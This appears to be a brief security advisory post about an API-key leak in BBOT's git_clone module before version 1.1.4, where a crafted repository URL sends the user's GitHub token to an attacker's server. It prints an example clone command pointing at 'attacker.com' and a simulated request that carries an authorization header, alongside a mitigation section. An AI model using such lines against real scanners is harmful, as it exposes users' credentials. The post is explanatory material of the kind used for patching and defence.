Listen to this Post
How the CVE Works:
The vulnerability exists within BBOT’s `git_clone.py` module. When processing a git repository URL from an untrusted source, the module performs a network operation. Due to improper URL parsing and handling, it is possible to craft a malicious URL that forces the application to send the HTTP request, including the `Authorization` header, to an attacker-controlled web server instead of the intended git service. This header contains the user’s GitHub API key, which is automatically attached from BBOT’s configuration for modules like github_codesearch. The leak occurs during the initial fetch/clone operation before any validation against the expected git platform, exposing the secret credential.
Platform: BBOT
Version: pre-1.1.4
Vulnerability: API Key Leak
Severity: Moderate
date: 2024-10-09
Prediction: Patch by 2024-10-16
What Undercode Say:
git clone http://attacker.com/malicious/repo.git
Simulated vulnerable request with auth header
requests.get(malicious_url, headers={'Authorization': 'token ghp_secretkey'})
How Exploit:
Attacker hosts a malicious HTTP server. A victim scans a specially crafted git URL. The BBOT module sends the API key in the authorization header to the attacker’s server during the clone operation.
Protection from this CVE:
Update BBOT to a patched version. Sanitize and validate all input URLs. Use API keys with minimal required permissions. Implement network egress filtering.
Impact:
Credential leakage leading to unauthorized access to private GitHub repositories and associated resources.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
